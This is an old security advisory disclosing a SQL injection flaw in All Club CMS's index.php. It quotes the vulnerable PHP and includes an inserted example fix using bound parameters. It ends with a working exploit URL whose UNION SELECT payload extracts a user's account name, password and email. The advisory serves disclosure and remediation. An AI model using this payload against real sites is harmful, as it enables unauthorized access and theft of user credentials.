allclub-sql.txt

2008-02-06T00:00:00
ID PACKETSTORM:63307
Type packetstorm
Reporter ka0x
Modified 2008-02-06T00:00:00

Description

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
All Club CMS <= 0.0.1f index.php Remote SQL Injection Vulnerability  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
  
bug found by ka0x  
D.O.M TEAM 2008  
we are: ka0x, an0de, xarnuz  
http://www.domlabs.org/  
  
Script affected: All Club CMS  
Vulnerability: Remote SQL Injection  
  
Download: http://sourceforge.net/project/showfiles.php?group_id=209058  
need magic_quotes_gpc = off  
  
  
vuln code:  
  
[...]  
  
if (isset($_GET['name']) && (!(empty($_GET['name'])))) {  
  
    $name = $_GET['name'];  
    $name = stripslashes($name);    // removes the backslashes magic_quotes_gpc would have added  
    // stop hackers  
    if (eregi("http\:\/\/", $name)) {    // only blocks input containing "http://"  
        echo "<br />  No go on the hack attempt.<br />";  
        // log attempt, from IP, etc.  
        if ($SYS_SET['ban_attack_ip']) {  
            // ban ip if ban_attack_ip  
        }  
        die();  
    }  
  
    // $name is interpolated straight into the SQL string; prepare() gets no placeholder to bind  
    $sth = $dbh->prepare("SELECT * FROM accms_modules WHERE name='$name'");  
  
[...]  
  
  
The stripslashes() function only removes backslashes (\), and doubled  
backslashes (\\) become single ones (\), so any escaping added before this  
point is undone and the single quote in $name reaches the query intact.  
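As an added example (not part of the advisory or of All Club CMS), the same module lookup rewritten so the user value is bound as a parameter instead of being interpolated into the SQL text; it assumes $dbh is a PDO connection and that a module name is restricted to a simple identifier character set.  

```php
<?php
// Added example, not code from the advisory or from All Club CMS.
// Assumption: $dbh is a PDO connection to the accms database.

function fetch_module(PDO $dbh, string $name): ?array
{
    // Allow-list the shape of a module name before it reaches the database.
    // The original "http://" check only matched one substring; an allow-list
    // rejects everything that is not a plausible identifier.
    if ($name === '' || strlen($name) > 64 || !preg_match('/^[A-Za-z0-9_-]+$/', $name)) {
        return null;
    }

    // The value is sent separately from the SQL text via a placeholder, so a
    // quote inside $name cannot terminate the string literal. No stripslashes()
    // or addslashes() juggling is needed, and the outcome no longer depends on
    // the magic_quotes_gpc setting.
    $sth = $dbh->prepare('SELECT * FROM accms_modules WHERE name = :name');
    $sth->bindValue(':name', $name, PDO::PARAM_STR);
    $sth->execute();

    $row = $sth->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Assumed integration point at the top of index.php.
if (isset($_GET['name']) && $_GET['name'] !== '') {
    $module = fetch_module($dbh, (string) $_GET['name']);
    if ($module === null) {
        http_response_code(404);
        exit('Unknown module.');
    }
}
```

Disabling emulated prepares (PDO::ATTR_EMULATE_PREPARES set to false on $dbh) makes the database server itself parse the statement with the placeholder, so the separation of code and data is enforced server-side rather than by client-side quoting.  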
  
  
Exploit:  
http://[host]/accms_path/index.php?name=-1'/**/union/**/select/**/1,concat(account,0x3a,password,0x3a,email),3,4,5,6,7,8,9,1,1,1,1/**/from/**/accms_users/**/where/**/id=1/*  
  
  
__EOF__  